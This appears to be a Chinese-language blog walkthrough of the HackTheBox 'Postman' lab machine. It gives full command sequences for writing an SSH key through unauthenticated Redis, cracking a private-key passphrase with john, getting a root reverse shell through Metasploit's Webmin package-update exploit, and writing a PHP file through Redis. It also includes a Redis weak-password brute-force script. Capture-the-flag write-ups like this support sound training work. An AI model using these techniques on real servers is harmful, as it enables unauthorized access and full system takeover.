xXxYOLOxXx

xXxYOLOxXx

HackTheBox_Postman

Posted on In

迟来的文章

HackTheBox_Postman

2020/01/15 19:55:48

信息收集

端口扫描

nmap -sV -Pn -p 1-10000 -T5 -n -v -A 10.10.10.160

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Nmap scan report for 10.10.10.160
Host is up (0.29s latency).
Not shown: 9326 closed ports, 672 filtered ports
PORT      STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 91549383E709F4F1DD6C8DAB07890301
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: MiniServ/1.910
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.1.1 (92%), Android 4.1.2 (92%), Android 4.2.2 (Linux 3.4) (92%)
No exact OS matches for host (test conditions non-ideal).

Web路径枚举

尝试爆破80端口下的Web路径
未发现有效信息

漏洞利用

尝试直接登入redis服务

1
redis-cli -h 10.10.10.160

利用redis未授权写入ssh密钥,再用ssh登入redis账户

1
2
3
4
5
6
7
8
9
rm -rf ~/.ssh/id*
ssh-keygen -t rsa
(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n") > new.txt
redis-cli -h 10.10.10.160 flushall
cat new.txt | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/
redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save
ssh -i /root/.ssh/id_rsa redis@10.10.10.160

无法在/var/www/html/目录下写入WebShell

发现文件/opt/id_rsa.bak

1
2
3
4
ls -l /opt

total 4
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 id_rsa.bak

可以确定是Matt账户的ssh密钥

拷贝到本地之后再用脚本转为john可以破解的密码形式

1
2
3
/usr/share/john/ssh2john.py id_rsa.bak > ssh
john --wordlist=/usr/share/wordlists/rockyou.txt ssh
    computer2008

得到Matt账户的口令,使用SSH登入Matt账户

1
2
ssh Matt@10.10.10.160
computer2008

权限提升

在MSF中搜索Webmin的相关漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
search webmin

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_packageup_rce      2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution
   3  exploit/unix/webapp/webmin_backdoor          2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor
   4  exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution
   5  exploit/unix/webapp/webmin_upload_exec       2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE

MSF中调用漏洞利用工具

1
2
3
4
5
6
7
8
use exploit/linux/http/webmin_packageup_rce
set payload cmd/unix/reverse_netcat
set LHOST 10.10.16.14
set RHOSTS 10.10.10.160
set USERNAME Matt
set PASSWORD computer2008
set SSL true
run

获取root权限

1
2
id
uid=0(root) gid=0(root) groups=0(root)

Redis登入之后,可以考虑写入一句话后门/phpinfo这个思路

1
2
3
4
config set dir /var/www/html/
config set dbfilename shell.php
set webshell "<?php phpinfo(); ?>"
save

而这台靶机中无法在/var/www/html/目录下写入文件,提权也比较困难,只能写入SSH密钥

附:
Redis弱口令探测脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# -*-  coding:utf-8 -*-
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send("INFO\r\n")
        result = s.recv(1024)
        if "redis_version" in result:
            return u"未授权访问"
        elif "Authentication" in result:
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("AUTH %s\r\n" %(pass_))
                result = s.recv(1024)
                if '+OK' in result:
                    return u"存在弱口令,密码:%s" % (pass_)
    except Exception, e:
        pass
if __name__ == '__main__':
    ip=sys.argv[1]
    port=sys.argv[2]
    print check(ip,port, timeout=10)

nmap扫描速度巨慢,而且总是会扫漏几个端口,甚至扫全端口时总是会中途因为900s的数据包延迟而中断扫描…(体验极差)

Redis的操作完全没有接触过,十分生疏

Webmin的漏洞利用倒是异常的顺利

参考资料

redis
wp